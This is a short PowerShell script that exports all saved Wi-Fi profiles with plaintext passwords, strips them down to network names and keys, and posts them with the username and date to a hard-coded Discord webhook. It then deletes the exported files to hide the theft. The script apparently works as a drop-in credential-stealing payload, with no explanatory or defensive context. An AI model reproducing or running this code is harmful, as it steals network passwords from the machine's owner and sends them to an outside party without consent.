$TempDir = [System.IO.Path]::GetTempPath()
cd $TempDir

netsh wlan export profile key=clear

Select-String -Path Wi*.xml -Pattern 'keyMaterial' > Wi-Fi-pass

(Get-Content .\Wi-Fi-pass).Replace('<keyMaterial>', '').Replace('</keyMaterial>', '').Replace('Wi-Fi-', "(+) ").Replace("`t", '').Replace('.xml:22:', ' : ') | where {$_.trim() -ne ""} | Set-Content .\Wi-Fi-cleaned

$hookUrl = 'https://discord.com/api/webhooks/1242800979112493088/8glRAWaSzV8NZVt19qR8ZbC5DQKksfuWuNjpVvvuHxb3s_cf22ygq0vGy607Ty-tMJ1R'
$title = $env:username
$Date = Get-Date
$Body = Get-Content .\Wi-Fi-cleaned | Out-String

$embedObject = [PSCustomObject]@{
    color = 65280
    title = $title + ' - ' + $Date
    description = $Body
}

[System.Collections.ArrayList]$embedArray = @()

$embedArray.Add($embedObject)

$payload = [PSCustomObject]@{
    embeds = $embedArray
}

Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'application/json; charset=utf-8'

Remove-Item Wi-Fi*
